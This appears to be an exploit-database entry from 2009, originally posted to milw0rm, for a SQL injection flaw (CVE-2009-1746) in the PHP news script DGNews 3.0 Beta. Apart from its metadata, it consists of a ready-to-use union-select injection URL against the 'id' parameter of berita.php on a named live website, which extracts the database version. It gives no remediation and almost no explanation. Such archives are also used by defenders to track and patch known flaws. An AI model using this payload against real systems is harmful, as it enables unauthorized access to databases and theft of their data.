EXPLOITS

DGNews 3.0 Beta - 'id' SQL Injection

Author: Cyber-Zone
type: webapps
platform: php
port: 
date_added: 2009-05-17  
date_updated:   
verified: 1  
codes: OSVDB-54658;CVE-2009-1746  
tags:   
aliases:   
screenshot_url:   
application_url:   

raw file: 8727.txt  

********************************************************************
* DGNews 3.0 Beta (berita.php) Remote SQL Injection Vulnerability  *
********************************************************************

http://diangemilang.com/news/berita.php?view=detail&id=-28+union+select+1,version(),3,4,5,6,7,8,9,10,11--

mysql 5 :)

Download :- http://www.diangemilang.com/download/comment.php?dlid=33&ENGINEsessID=2fcff934ccb74a561cd4c5df3dacd345

# milw0rm.com [2009-05-18]